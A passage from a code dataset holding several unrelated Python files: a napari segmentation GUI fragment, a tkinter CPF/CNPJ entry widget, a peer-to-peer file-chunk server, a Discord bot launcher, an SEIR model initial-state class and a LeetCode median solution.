export_label_layers(regions_directory, label_layers, resolution)\n\n if splines:\n export_splines(tracks_directory, splines, spline_names, resolution)\n print(\"Finished!\\n\")\n\n\n@thread_worker\ndef save_all(\n regions_directory,\n tracks_directory,\n label_layers,\n points_layers,\n track_file_extension=\".points\",\n):\n\n if label_layers:\n save_label_layers(regions_directory, label_layers)\n\n if points_layers:\n save_track_layers(\n tracks_directory,\n points_layers,\n track_file_extension=track_file_extension,\n )\n print(\"Finished!\\n\")\n\n\ndef main():\n print(\"Loading segmentation GUI.\\n \")\n with napari.gui_qt():\n viewer = napari.Viewer() # title=\"Segmentation GUI\")\n viewer.window.resize(WINDOW_WIDTH, WINDOW_HEIGHT)\n widget = SegmentationWidget(viewer)\n viewer.window.add_dock_widget(widget, name=\"General\", area=\"right\")\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"brainreg_segment/segment.py","file_name":"segment.py","file_ext":"py","file_size_in_byte":19672,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"322088597","text":"# Lucas Petersen\n# 12 de Fevereiro de 2021\n\nimport tkinter as tk\nimport warnings\nfrom pycadastros import formatCadastro\n\n\nclass EntryCPF:\n def __init__(self):\n pass\n\n\nclass EntryCNPJ:\n def __init__(self):\n pass\n\n\nclass EntryCadastro:\n def __init__(self, root, truebd='#74c454', falsebd='#c7271c', justify=tk.CENTER, borderwidth=3, mask=True,\n update=True, changeBorder=True, highlightcolor='white', **kwargs):\n # TODO -- CONFIG -- criar opção de dar update no resultado ou não (callback)\n # TODO -- CONFIG -- criar opção de mudar a cor da borda ou não\n # TODO -- WIDGET -- criar opção de mask de cpf, mask de cnpj ou a atual, que serve pros dois\n # TODO -- VALIDAÇÃO -- criar opção de fill leading zeros ou não\n # TODO -- VALIDAÇÃO -- Autodetecção (validação por callback) não considera leading zeros ainda\n\n self.textvar = tk.StringVar()\n self.root = root\n self.borderwidth = borderwidth\n self.validate = 'key'\n self.vcmd = (self.root.register(self.validateNumbers), '%S')\n self.updateEntry = self.callback\n self.justify = justify\n self.truebd = truebd\n self.falsebd = falsebd\n self.mask = mask\n self.update = update\n self.changeBorder = changeBorder\n self.highlightcolor = highlightcolor\n\n self.mywidget = tk.Entry(self.root, validate=self.validate, vcmd=self.vcmd, justify=self.justify,\n highlightthickness=self.borderwidth, textvariable=self.textvar,\n highlightcolor=highlightcolor, **kwargs)\n\n self.x = 0\n self.y = 0\n self.width = 0\n self.height = 0\n\n self.textvar.trace('w', lambda name, index, mode, sv=self.textvar: self.updateEntry())\n self.textvar.trace('w', lambda *args: self.characterLimit())\n\n def callback(self):\n self.mywidget.config(highlightcolor=self.falsebd, highlightbackground=self.falsebd)\n self.mywidget.config(selectbackground=self.mywidget.cget('highlightcolor'))\n cad = self.mywidget.get()\n if cad is not None:\n if len(self.mywidget.get().replace(',', '').replace('.', '').replace('/', '').replace('-', '')) >= 11:\n if self.mask:\n cadmasked = self.get(mask=True)\n else:\n cadmasked = self.get(mask=False)\n if cadmasked is not None:\n self.textvar.set(cadmasked)\n self.mywidget.config(vcmd=self.vcmd)\n self.mywidget.icursor('end')\n\n def characterLimit(self):\n lchars = list(str(self.mywidget.get()))\n for lchar in lchars:\n if lchar not in ['1', '2', '3', '4', '5', '6', '7', '8', '9', '0', '-', '/', '.']:\n lchars.remove(lchar)\n\n self.textvar.set(''.join(lchars))\n if len(self.mywidget.get()) > 14:\n self.textvar.set(self.mywidget.get()[:-1])\n\n # TODO -- DEBUG -- Entender pq essa função tá esse Warning\n def validateNumbers(self, n):\n if n in ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9', '.', '/', '-']:\n return True\n else:\n return False\n\n def get(self, mask=False, fill=True):\n if mask and not fill:\n warnings.warn(\"'fill' convertido para True por conta de 'mask' estar como True.\")\n self.mywidget.config(highlightcolor=self.truebd, highlightbackground=self.truebd)\n self.mywidget.config(selectbackground=self.mywidget.cget('highlightcolor'))\n\n cadastro = formatCadastro(self.mywidget.get())\n if cadastro is None:\n self.mywidget.config(highlightcolor=self.falsebd, highlightbackground=self.falsebd)\n return None\n\n else:\n self.mywidget.config(highlightcolor=self.truebd, highlightbackground=self.truebd)\n self.mywidget.config(selectbackground=self.mywidget.cget('highlightcolor'))\n if mask:\n return cadastro[2]\n\n else:\n if fill:\n return cadastro[1]\n else:\n return cadastro[0]\n\n def getType(self):\n return formatCadastro(self.mywidget.get())[3]\n\n def isValid(self):\n return formatCadastro(self.mywidget.get()) is not None\n\n def isCPF(self):\n try:\n cadastro = formatCadastro(self.mywidget.get())[3]\n except:\n return False\n return cadastro == 'CPF'\n\n def isCNPJ(self):\n try:\n cadastro = formatCadastro(self.mywidget.get())[3]\n except:\n return False\n return cadastro == 'CNPJ'\n\n def place(self, **kwargs):\n self.mywidget.place(**kwargs)\n\n def pack(self, **kwargs):\n self.mywidget.pack(**kwargs)\n\n def grid(self, **kwargs):\n self.mywidget.grid(**kwargs)\n\n\nwinW, winH = 600, 300\nw, h = 270, 40\nwindow = tk.Tk()\nwindow.geometry(f'{winW}x{winH}')\nwindow.configure(background='#051d60')\n\nentry = EntryCadastro(window, font=('Century Gothic', '18'), bg='#051d60', borderwidth=1, relief=tk.FLAT, fg='white')\nentry.place(x=(winW-w)//2, y=(winH-h)//2, h=43)\n\nentry2 = EntryCadastro(window, font=('Roboto Medium', '14'), mask=False)\nentry2.place(x=(winW-w)//2, y=(winH-h)//2+h+10, width=w, height=h)\n\n\ndef myf():\n print(entry.isValid())\n print(entry.isCPF())\n print(entry.isCNPJ())\n\n\ndef myf2():\n print(entry2.get(mask=True))\n\n\nb = tk.Button(window, command=myf, text='entry de cima')\nb.place(x=0, y=0, width=100, height=30)\n\nb2 = tk.Button(window, command=myf2, text='entry de baixo')\nb2.place(x=0, y=40, width=100, height=30)\n\nwindow.mainloop()\n","sub_path":"newEntry.py","file_name":"newEntry.py","file_ext":"py","file_size_in_byte":5724,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"621407811","text":"import os.path\r\nfrom os import path\r\nimport sys\r\nimport socket\r\nfrom sys import argv\r\nfrom pathlib import Path\r\nfrom _thread import *\r\n\r\nlist_peer = {}\r\nmaster_DB = {}\r\nport_DB = {}\r\n\r\nclass Constants:\r\n LIST = \"LIST\"\r\n NAME = \"NAME\"\r\n REQUEST = \"REQUEST\"\r\n DATA = \"DATA\"\r\n REGISTER = \"REGISTER\"\r\n PEER = \"PEER\"\r\n CLOSE = \"CLOSE\"\r\n BRACE_OPEN = \"[\"\r\n CONNECTION_ESTABLISHED = \"] connection established from \" \r\n PEER_LIST = \"[Owner] Peer list:\" \r\n PEER_U_D = \"[Owner] Transmitting Upload/Download peers\" \r\n OWNER_UP_RUN = \"[Owner] Owner is up and running:\" \r\n OWNER_GETS_MESSAGE = \"[Owner] gets message (\" \r\n FROM = \") from \" \r\n ERROR_OCCURED = \"Error Occurred\" \r\n FILE_OWNER = \"File Owner\" \r\n WAITING_PEER = \" is waiting for peers...\"\r\n CONFIG = \"CONFIG\" \r\n OWNER_DIR = \"OwnerDir\" \r\n OWNER_DIR_1 = \"OwnerDir/\" \r\n BLOCK = \"Block -->\" \r\n BYTES = \" bytes\" \r\n OWNER_TOTAL = \"[Owner] Total \" \r\n BLOCKS = \" Blocks\" \r\n EQUALS = \" = \" \r\n SPACE = \" \" \r\n\r\n\r\n# This class contains all the methods required by the File Owner.\r\nclass OwnerProcess:\r\n # protected ObjectOutputStream object_output_stream\r\n # protected ObjectInputStream input_stream\r\n peer_name = 0\r\n _current_block = {}\r\n file_name = \"\"\r\n peer_id = 0\r\n port = 0\r\n\r\n # Creates the owner process that communicates with peers for all the transactions\r\n # file chunks\r\n # socket class that accepts connections from peer clients\r\n # ObjectOutputStream that writes to the specified OutputStream\r\n # deserialize\r\n\r\n def __init__(self, block, file_name, con, addr, peer_port, thread_number, peer_id, port):\r\n # print(\"Inside init of OwnerProcess\")\r\n self._current_block = block\r\n self.file_name = file_name\r\n self.con = con\r\n self.addr = addr\r\n self.clientId = peer_port\r\n self.peer_name = thread_number\r\n self.peer_id = peer_id\r\n self.port= port\r\n print(Constants.BRACE_OPEN + \"Thread-\" + str(self.peer_name) + Constants.CONNECTION_ESTABLISHED + str(addr[1]))\r\n\r\n # Communicates with peer for transferring messages\r\n # msg message to be transferred\r\n\r\n def transferMessageToPeer(self, msg):\r\n try:\r\n self.con.send(msg.encode())\r\n except:\r\n print(\"Exception in transferMessageToPeer function\")\r\n\r\n _clientId = -1\r\n\r\n # sends reponse to every peer\r\n\r\n # message message to be transferred\r\n # x\r\n\r\n def __replyToIndividualPeerRequest(self,message, x):\r\n if message == Constants.LIST:\r\n self.__performListOperation()\r\n elif message == Constants.NAME:\r\n print(self.file_name)\r\n self.transferMessageToPeer(str(self.file_name))\r\n elif message == Constants.REQUEST:\r\n self.__performRequestOperation(x)\r\n elif message == Constants.DATA:\r\n x = int(self.con.recv(1024).decode())\r\n chunk = self.con.recv(1024)\r\n elif message == Constants.REGISTER:\r\n self.__performRegisterOperation()\r\n elif message == Constants.PEER:\r\n self.__performPeerOperation()\r\n elif message == Constants.CLOSE:\r\n self.__performCloseOperation()\r\n\r\n # List all the blocks\r\n\r\n def __performListOperation(self):\r\n y = len(self._current_block)\r\n arrayList = []\r\n for i in range(0, y):\r\n if i in self._current_block.keys():\r\n arrayList.append(i)\r\n\r\n arrayList = str(arrayList)\r\n arrayList = arrayList.encode()\r\n self.con.send(arrayList)\r\n\r\n\r\n # sends download and upload neighbour to individual peer\r\n\r\n def __performPeerOperation(self):\r\n print(Constants.PEER_LIST)\r\n self.con.send((\"abc\").encode())\r\n peer_id = self.con.recv(1024)\r\n for peer in list_peer.keys():\r\n print(peer , \" \")\r\n\r\n self.con.send((\"abc\").encode())\r\n peer_port = int(self.con.recv(1024).decode())\r\n self.con.send((\"abc\").encode())\r\n download_port = int(self.con.recv(1024).decode())\r\n print(peer_port , \" \" , download_port)\r\n print(Constants.PEER_U_D)\r\n self.con.send(str(list_peer).encode())\r\n self.con.recv(1024)\r\n download_neighbor_id=0\r\n if download_port in master_DB.keys():\r\n download_neighbor_id = master_DB[download_port]\r\n self.transferMessageToPeer(str(download_neighbor_id))\r\n self.con.recv(1024)\r\n upload_neighbor_id = self.getUploadNeighbor(peer_port)\r\n self.transferMessageToPeer(str(upload_neighbor_id))\r\n\r\n\r\n # Gets the upload neighbor of a peer\r\n def getUploadNeighbor(self, peer_port):\r\n upload_neighbor_id = 0\r\n for i in port_DB.keys():\r\n if port_DB[i].getDownload_port() == peer_port:\r\n peer_id = port_DB[i].getPeer_port()\r\n upload_neighbor_id = master_DB[peer_id]\r\n break\r\n return upload_neighbor_id\r\n\r\n def __performCloseOperation(self):\r\n self.con.close()\r\n list_peer.pop(self.clientId)\r\n\r\n def __performRequestOperation(self,x):\r\n self.con.send(bytes(\"yashwant\", 'utf-8'))\r\n x = int(self.con.recv(1024).decode())\r\n self.transferMessageToPeer(str(x))\r\n self.con.recv(1024).decode()\r\n self.con.send(self._current_block[x])\r\n\r\n\r\n def __performRegisterOperation(self):\r\n peer = self.peer_id\r\n list_peer[self.peer_id] = self.port\r\n print(peer)\r\n print(list_peer)\r\n port = self.port\r\n print(port)\r\n self.transferMessageToPeer(str(peer))\r\n self.con.recv(1024).decode()\r\n self.transferMessageToPeer(str(port))\r\n\r\n def __initiate_run(self):\r\n print(Constants.OWNER_UP_RUN)\r\n input_from_peer = \"\"\r\n while True:\r\n try:\r\n input_from_peer = self.con.recv(1024)\r\n break\r\n except:\r\n print(\"Exception at __initiate_run() in OwnerProcess class\")\r\n exit()\r\n break\r\n\r\n msg = str(input_from_peer.decode())\r\n print(Constants.OWNER_GETS_MESSAGE + msg + Constants.FROM + str(self.clientId))\r\n return msg\r\n\r\n\r\n # If this thread was constructed using a separate\r\n # run object, then that\r\n # objects method is called\r\n def run(self):\r\n # print(\"Hello\")\r\n while True:\r\n # try:\r\n message = self.__initiate_run()\r\n print(Constants.OWNER_GETS_MESSAGE + message + Constants.FROM + str(self.clientId))\r\n x = -1\r\n self.__replyToIndividualPeerRequest(message, x)\r\n # except:\r\n # print(Constants.ERROR_OCCURED)\r\n # print(\"Error in run() function in OwnerProcess class\")\r\n # list_peer.pop(self.clientId)\r\n # return\r\n\r\n\r\n# Class maintaining download and upload ports of different peers\r\nclass PortDB:\r\n __peer_port = 0\r\n __download_port = 0\r\n\r\n def __init__(self, peer_port, download_port):\r\n self.__peer_port = peer_port\r\n self.__download_port = download_port\r\n\r\n def getDownload_port(self):\r\n return self.__download_port\r\n\r\n def getPeer_port(self):\r\n return self.__peer_port\r\n\r\n\r\n\r\n\r\n# Class containing all the methods required by a FileOwner.\r\nclass FileOwner:\r\n thread_number = -1\r\n __file_name = \"\"\r\n __owner_port = 0\r\n # ServerSocket = socket.socket()\r\n ServerSocket=socket.socket()\r\n peer_id = 0\r\n port = 0\r\n\r\n # peer configs\r\n FILE_MAX_SIZE = 1024 * 100\r\n read_buffer_size = 1024\r\n\r\n # chunk_id and chunk\r\n file_block_list = {}\r\n peerName = Constants.FILE_OWNER\r\n\r\n # Creates the FileOwner that distributes the file chunks to different peers.\r\n # _owner_port\r\n # _file_name\r\n\r\n def __init__(self, owner_port, file_name):\r\n # print(\"constructor\")\r\n if file_name != None and path.exists(file_name):\r\n self.__file_name = file_name\r\n\r\n self.__owner_port = int(owner_port)\r\n\r\n try:\r\n # host = socket.gethostname()\r\n host = \"localhost\"\r\n self.ServerSocket.bind((host, self.__owner_port))\r\n self.ServerSocket.listen(5)\r\n except:\r\n print(\"program exited\")\r\n sys.exit(1)\r\n\r\n # Init file chunk list\r\n self.__divideFileIntoChunks()\r\n\r\n # Initiates the file owner process\r\n\r\n def initiateOwner(self):\r\n #try:\r\n while True:\r\n self.thread_number+=1\r\n print(self.peerName + Constants.WAITING_PEER)\r\n con, addr = self.ServerSocket.accept()\r\n print(\"A new connection request has been accepted\")\r\n message_from_client = con.recv(1024).decode()\r\n con.send((\"124\").encode())\r\n print(\"message from client :: \" + message_from_client)\r\n if message_from_client.upper().startswith(Constants.CONFIG):\r\n split_string = message_from_client.split(\" \")\r\n id = int(split_string[1])\r\n peer_port = int(split_string[2])\r\n download_port = int(split_string[3])\r\n self.peer_id = id\r\n self.port = peer_port\r\n self.__createDB(id, peer_port, download_port)\r\n\r\n print(self.__file_name)\r\n op = OwnerProcess(self.file_block_list, self.__file_name, con, addr, self.port, self.thread_number, self.peer_id, self.port)\r\n start_new_thread(op.run,())\r\n\r\n # except:\r\n # print(\"An exception occured\")\r\n\r\n\r\n # creates Master database which stores different peers and their ports.\r\n # id peer id\r\n # peer_port peer port\r\n # download_port port of download neighbour\r\n def __createDB(self, id, peer_port, download_port):\r\n master_DB[peer_port] = id\r\n port_DB[id] = PortDB(peer_port, download_port)\r\n\r\n\r\n def _chunk_file(self, file, extension):\r\n current_chunk_size = 0\r\n current_chunk = 0\r\n print(Constants.BLOCK + str(current_chunk) + Constants.EQUALS + \"102400\" + Constants.BYTES)\r\n location = \"OwnerDir/\" + str(current_chunk)\r\n done_reading = False\r\n while not done_reading:\r\n bfr1=None\r\n with open(f'{location}{extension}.chk', 'ab') as chunk:\r\n while True:\r\n bfr = file.read(self.read_buffer_size)\r\n if bfr1==None:\r\n bfr1=bfr\r\n else:\r\n bfr1+=bfr\r\n if not bfr:\r\n done_reading = True\r\n self.file_block_list[current_chunk] = bfr1\r\n print(str(current_chunk) + \" : \", len(self.file_block_list[current_chunk]))\r\n break\r\n\r\n chunk.write(bfr)\r\n current_chunk_size += len(bfr)\r\n\r\n if current_chunk_size + self.read_buffer_size > self.FILE_MAX_SIZE:\r\n self.file_block_list[current_chunk] = bfr1\r\n print(str(current_chunk) + \" : \", len(self.file_block_list[current_chunk]))\r\n current_chunk += 1\r\n location = \"OwnerDir/\" + str(current_chunk)\r\n current_chunk_size = 0\r\n break\r\n\r\n # Divides the file into various chunks\r\n def __divideFileIntoChunks(self):\r\n try:\r\n sepDir = Constants.OWNER_DIR\r\n sepDir = os.path.join(\"D:\\Work\\ComputerNetwork\\P2P\\FileOwner/\" + sepDir)\r\n if not path.exists(sepDir):\r\n os.mkdir(sepDir)\r\n\r\n p = Path.cwd()\r\n file_to_split = None\r\n for f in p.iterdir():\r\n if f.is_file() and f.name == 'test.pdf':\r\n file_to_split = f\r\n break\r\n\r\n if file_to_split:\r\n with open(file_to_split, 'rb') as file:\r\n self._chunk_file(file, file_to_split.suffix)\r\n\r\n except:\r\n print(\"Exception in divide file into chunks\")\r\n exit(1)\r\n\r\n\r\n # def __testConfig(self):\r\n\r\n\r\n\r\nif __name__ == \"__main__\":\r\n n=len(sys.argv)\r\n # print(n)\r\n owner_port = 0\r\n file_name=\"test.pdf\"\r\n if n==2:\r\n owner_port=sys.argv[1]\r\n print(\"\")\r\n print(\"Owner Port: \" + owner_port + \" File name: \" + file_name)\r\n f1 = FileOwner(owner_port, file_name)\r\n f1.initiateOwner()\r\n # f1.test()\r\n elif(n==1):\r\n print(\"Mention Port number\")\r\n else:\r\n print(\"Only one argument is needed, i.e., Port Number\")","sub_path":"FileOwner/FileOwner.py","file_name":"FileOwner.py","file_ext":"py","file_size_in_byte":12797,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"489536670","text":"from __future__ import print_function\n\nimport os\nimport gc\nimport sys\nimport time\nimport traceback\nimport subprocess\nimport importlib\n\nclass ShutdownBus():\n def __init__(self):\n self.restart = False\n self.shutdown = False\n\n def bot_shutdown(self):\n self.restart = False\n self.shutdown = True\n\n def bot_restart(self):\n self.restart = True\n self.shutdown = True\n\n def reset(self):\n self.restart = False\n self.shutdown = False\n\nclass GIT(object):\n @classmethod\n def works(cls):\n try:\n return bool(subprocess.check_output('git --version', shell=True))\n except:\n return False\n\n\nclass PIP(object):\n @classmethod\n def run(cls, command, check_output=False):\n if not cls.works():\n raise RuntimeError(\"Could not import pip.\")\n\n try:\n return PIP.run_python_m(*command.split(), check_output=check_output)\n except subprocess.CalledProcessError as e:\n return e.returncode\n except:\n traceback.print_exc()\n print(\"Error using -m method\")\n\n @classmethod\n def run_python_m(cls, *args, **kwargs):\n check_output = kwargs.pop('check_output', False)\n check = subprocess.check_output if check_output else subprocess.check_call\n return check([sys.executable, '-m', 'pip'] + list(args))\n\n @classmethod\n def run_pip_main(cls, *args, **kwargs):\n import pip\n\n args = list(args)\n check_output = kwargs.pop('check_output', False)\n\n if check_output:\n from io import StringIO\n\n out = StringIO()\n sys.stdout = out\n\n try:\n pip.main(args)\n except:\n traceback.print_exc()\n finally:\n sys.stdout = sys.__stdout__\n\n out.seek(0)\n pipdata = out.read()\n out.close()\n\n print(pipdata)\n return pipdata\n else:\n return pip.main(args)\n\n @classmethod\n def run_install(cls, cmd, quiet=False, check_output=False):\n return cls.run(\"install %s%s\" % ('-q ' if quiet else '', cmd), check_output)\n\n @classmethod\n def run_show(cls, cmd, check_output=False):\n return cls.run(\"show %s\" % cmd, check_output)\n\n @classmethod\n def works(cls):\n try:\n import pip\n return True\n except ImportError:\n return False\n\n @classmethod\n def get_module_version(cls, mod):\n try:\n out = cls.run_show(mod, check_output=True)\n\n if isinstance(out, bytes):\n out = out.decode()\n\n datas = out.replace('\\r\\n', '\\n').split('\\n')\n expectedversion = datas[3]\n\n if expectedversion.startswith('Version: '):\n return expectedversion.split()[1]\n else:\n return [x.split()[1] for x in datas if x.startswith(\"Version: \")][0]\n except:\n pass\n\n\ndef main():\n\n sstate = ShutdownBus()\n\n if not sys.version_info >= (3, 5):\n print(\"[PB] Python 3.5+ is required. This version is %s\" % sys.version.split()[0])\n print(\"Attempting to locate python 3.5...\")\n\n pycom = None\n\n\n if sys.platform.startswith('win'):\n try:\n subprocess.check_output('py -3.5 -c \"exit()\"', shell=True)\n pycom = 'py -3.5'\n except:\n\n try:\n subprocess.check_output('python3 -c \"exit()\"', shell=True)\n pycom = 'python3'\n except:\n pass\n\n if pycom:\n print(\"\\nPython 3.5 found. Re-starting PlasmaBot using: \")\n print(\" %s run.py\\n\" % pycom)\n os.system('start cmd /k %s run.py' % pycom)\n sys.exit(0)\n\n else:\n try:\n pycom = subprocess.check_output(['which', 'python3.5']).strip().decode()\n except:\n pass\n\n if pycom:\n print(\"\\nPython 3.5 found. Re-starting PlasmaBot using: \")\n print(\" %s run.py\\n\" % pycom)\n\n os.execlp(pycom, pycom, 'run.py')\n\n print(\"Please run the bot using Python3.5\")\n input(\"Press ENTER to continue . . .\")\n\n return\n\n import asyncio\n\n tried_requirementstxt = False\n tryagain = True\n\n loops = 0\n max_wait_time = 60\n\n import plasmaBot\n\n while tryagain:\n\n try:\n importlib.reload(plasmaBot)\n\n m = plasmaBot.PlasmaBot(sstate)\n print(\"[PB] Connecting to Discord...\", end='', flush=True)\n m.run()\n\n except (KeyboardInterrupt, SystemExit):\n print(\"\\n[PB] Shutting Down...\\n\\nThanks for using PlasmaBot!\\n--------------------------------------------------------\")\n m.shutdown()\n break\n\n except SyntaxError:\n traceback.print_exc()\n break\n\n except ImportError as e:\n if not tried_requirementstxt:\n tried_requirementstxt = True\n\n # TODO: Better output\n print(e)\n print(\"[PB] Attempting to install PlasmaBot dependencies...\")\n\n err = PIP.run_install('--upgrade -r requirements.txt')\n\n if err:\n print(\"\\nYou should %s to install the PlasmaBot dependencies.\" %\n ['use sudo', 'run as admin'][sys.platform.startswith('win')])\n break\n else:\n print(\"\\nDependencies Installed\\n\")\n else:\n traceback.print_exc()\n print(\"[PB] Unknown ImportError, closing.\")\n break\n\n except Exception as e:\n if hasattr(e, '__module__') and e.__module__ == 'plasmaBot.exceptions':\n if e.__class__.__name__ == 'HelpfulError':\n print(e.message)\n break\n else:\n if (sstate.shutdown is True):\n if sstate.restart is True:\n print(\"\\n[PB] Restarting...\\n\\nThanks for using PlasmaBot!\\n\")\n loops = -1\n sstate.reset()\n\n if m:\n del m\n else:\n print(\"\\n[PB] Shutting Down...\\n\\nThanks for using PlasmaBot!\\n--------------------------------------------------------\")\n break\n else:\n traceback.print_exc()\n\n finally:\n asyncio.set_event_loop(asyncio.new_event_loop())\n loops += 1\n\n print(\"Cleaning up... \", end='')\n gc.collect()\n print(\"Done.\")\n\n sleeptime = min(loops * 2, max_wait_time)\n if sleeptime:\n print(\"Restarting in {} seconds...\".format(loops*2))\n time.sleep(sleeptime)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":7033,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"498459530","text":"import numpy as np\nimport pickle\nimport os\nfrom datetime import datetime, timedelta\nimport pandas as pd\n# todo: this fxn is duplicated in io_support -- reorganize so it gets a single def that is easily imported where needed\n\nclass InitialModelState:\n\n def __init__(self, total_time, interval_per_day, n_age, n_risk, initial_i, metro_pop):\n\n self.total_time = total_time\n self.interval_per_day = interval_per_day\n self.n_age = n_age\n self.n_risk = n_risk\n self.initial_i = initial_i\n self.metro_pop = metro_pop\n self.start_day = None\n self.offset = None\n\n def initialize(self):\n\n if isinstance(self.initial_i, str):\n if os.path.exists(self.initial_i):\n return self.initialize_from_deterministic()\n else:\n raise ValueError('Initial state is provided as a string that does not map to a valid file path.')\n\n elif isinstance(self.initial_i, np.ndarray):\n return self.initialize_from_start()\n\n elif isinstance(self.initial_i, list):\n return self.initialize_from_start()\n\n else:\n print(type(self.initial_i))\n raise ValueError('Initial conditions provided are not supported.')\n\n def instantaneous_state(self, min_hosp=10):\n\n # todo: implement checks to make sure the deterministic solution read in is actually the one you want\n # todo: for example, is it the right city? the right params?\n # todo: this might require packaging the config with the outputs so a few things can be checked easily after loading this file\n with open(self.initial_i, 'rb') as xp:\n data = pickle.load(xp)\n\n if len(data.c_reduction.values) > 1:\n raise ValueError('Instantaneous states are currently only supported for deterministic runs with fixed contact reduction levels.')\n\n dataset = data.to_dataset('compartment')\n\n # todo: this syntax can replace compartment_stack() where resolution == 'point'\n hosp_slice = dataset['Iy'].sel({\n 'beta0': dataset['beta0'].values.item(),\n 'c_reduction': dataset['c_reduction'].values.item(),\n 'g_rate': 'high',\n 'reopen_trigger': dataset['reopen_trigger'].values.item(),\n 'close_trigger': dataset['close_trigger'].values.item()\n }).sum(dim=['age_group', 'risk_group']).to_dataframe().reset_index()\n\n # assume the first date's HH:MM:SS is always 00:00:00\n hosp_slice_daily = hosp_slice.iloc[::self.interval_per_day, :]\n\n # assumption: single peak in hospitalizations; deterministic sim starts at 1 infected person so the\n # beginning of the time series will always be below the threshold\n threshold_slice = hosp_slice_daily[hosp_slice_daily['Iy'] >= min_hosp]\n start_slice = threshold_slice['time'].min()\n self.offset = timedelta(hours = start_slice.hour,\n minutes = start_slice.minute,\n seconds = start_slice.second,\n microseconds= start_slice.microsecond)\n\n # we don't want to start mid-day because that would require a refactor how how the SEIR model handles dates\n # instead, drop day fraction to begin at zero hours of day \n self.start_day = datetime(start_slice.year, start_slice.month, start_slice.day)\n\n compartment_slices = {i: dataset[i].sel({\n 'beta0': dataset['beta0'].values.item(),\n 'c_reduction': dataset['c_reduction'].values.item(),\n 'g_rate': 'high',\n 'reopen_trigger': dataset['reopen_trigger'].values.item(),\n 'close_trigger': dataset['close_trigger'].values.item(),\n 'time': start_slice,\n 'replicate': 0 # possibly irrelevant for deterministic runs\n }).values for i in data.compartment.values}\n\n return compartment_slices\n\n def initialize_empty(self):\n \"\"\" Make an empty numpy array for each compartment, and return as a dictionary. \"\"\"\n\n compt_s = np.zeros(shape=(self.total_time * self.interval_per_day, self.n_age, self.n_risk)) # (t,a,r)\n compt_e, compt_ia, compt_iy, compt_e2compt_i = compt_s.copy(), compt_s.copy(), compt_s.copy(), compt_s.copy()\n compt_ih, compt_r, compt_e2compt_iy, compt_d = compt_s.copy(), compt_s.copy(), compt_s.copy(), compt_s.copy()\n compt_iy2compt_ih, compt_h2compt_d = compt_s.copy(), compt_s.copy()\n\n return {'S': compt_s, 'E': compt_e, 'Ia': compt_ia, 'Iy': compt_iy, 'E2I': compt_e2compt_i, 'Ih': compt_ih,\n 'R': compt_r, 'E2Iy': compt_e2compt_iy, 'D': compt_d, 'Iy2Ih': compt_iy2compt_ih, 'H2D': compt_h2compt_d}\n\n # todo: make a static method\n def update_initial_cond(self, array, t0_value):\n \"\"\" Update the initial condition of a compartment. \"\"\"\n\n array[0] = t0_value\n\n return array\n\n def initialize_infected_only(self, empty):\n \"\"\" Add infected compartment totals from the config and adjust metro pop accordingly. \"\"\"\n\n empty['S'] = self.update_initial_cond(empty['S'], self.metro_pop - self.initial_i)\n empty['Iy'] = self.update_initial_cond(empty['Iy'], self.initial_i)\n\n return empty\n\n def initialize_from_start(self):\n \"\"\" Return a dictionary of compartments, where only infected susceptible compartment contains non-zero entries \"\"\"\n\n # get empty arrays\n initial_comp_dict = self.initialize_empty()\n\n return self.initialize_infected_only(initial_comp_dict)\n\n def initialize_from_deterministic(self):\n \"\"\" Return a dictionary of compartments, each with initial conditions from a deterministic sim at time zero \"\"\"\n\n # get empty arrays\n initial_comp_dict = self.initialize_empty()\n\n # get start conditions from deterministic model\n deterministic_comp_dict = self.instantaneous_state()\n\n # add deterministic start conditions to the empty arrays\n for key, value in initial_comp_dict.items():\n if key not in deterministic_comp_dict.keys():\n # todo: move this error checking to param parser\n raise ValueError('Initial condition for compartment {} missing from input'.format(key))\n initial_cond = deterministic_comp_dict[key]\n initial_comp_dict[key] = self.update_initial_cond(initial_comp_dict[key], initial_cond)\n\n return initial_comp_dict","sub_path":"src/SEIRcity/get_initial_state.py","file_name":"get_initial_state.py","file_ext":"py","file_size_in_byte":6486,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"383681018","text":"# 처음 생각한 아이디어는 포인터 두개를 두고 동시에 움직이면서 Partition을 정확하게 절반씩 나누는 방법을 생각했는데, 이렇게되면 log() Time complexity가 나오지 않음.\n\n# Solution : 포인터 하나만 움직이고, 다른 포인터는 무조건 Partition을 절반으로하는 지점을 찾아서 계산하는 방식을 구현.\n# 포인터 크기를 idx의 두배값으로 잡아, 원소 갯수가 홀수/짝수일때에 대한 예외처리를 줄임 \n# Time : O(log(min(M,N))), Space :O(1) \n\nclass Solution:\n def findMedianSortedArrays(self, nums1: List[int], nums2: List[int]) -> float:\n n1, n2 = len(nums1), len(nums2)\n if n1 < n2:\n return self.findMedianSortedArrays(nums2, nums1)\n l, r = 0, 2*n2\n \n while l <= r:\n m2 = (l + r)//2\n m1 = n1 + n2 - m2\n \n L1 = nums1[(m1-1)//2] if m1 > 0 else float('-inf')\n R1 = nums1[m1//2] if m1 < 2*n1 else float('inf')\n L2 = nums2[(m2-1)//2] if m2 > 0 else float('-inf')\n R2 = nums2[m2//2] if m2 < 2*n2 else float('inf')\n if R1 < L2:\n r = m2 - 1\n elif R2 < L1:\n l = m2 + 1\n else: # L1와 L2 를 기준으로 오른쪽 파티션보다 값이 작은 절반 원소들로 구성되었음.\n return (max(L1, L2) + min(R1, R2)) / 2\n return -1 \n \n","sub_path":"Leetcode/Median_of_Two_Sorted_Arrays.py","file_name":"Median_of_Two_Sorted_Arrays.py","file_ext":"py","file_size_in_byte":1454,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"466196315","text":"\nn = int(input())\n\nwhile(n):\n n -= 1\n inp = input().split()\n seq_ch = []\n rat = inp[1]\n\n for b, i in enumerate(rat):\n if i == '/':\n index_slash = b\n\n p = int(rat[:index_slash])\n q = int(rat[index_slash + 1:])\n\n while(p != 1 or q 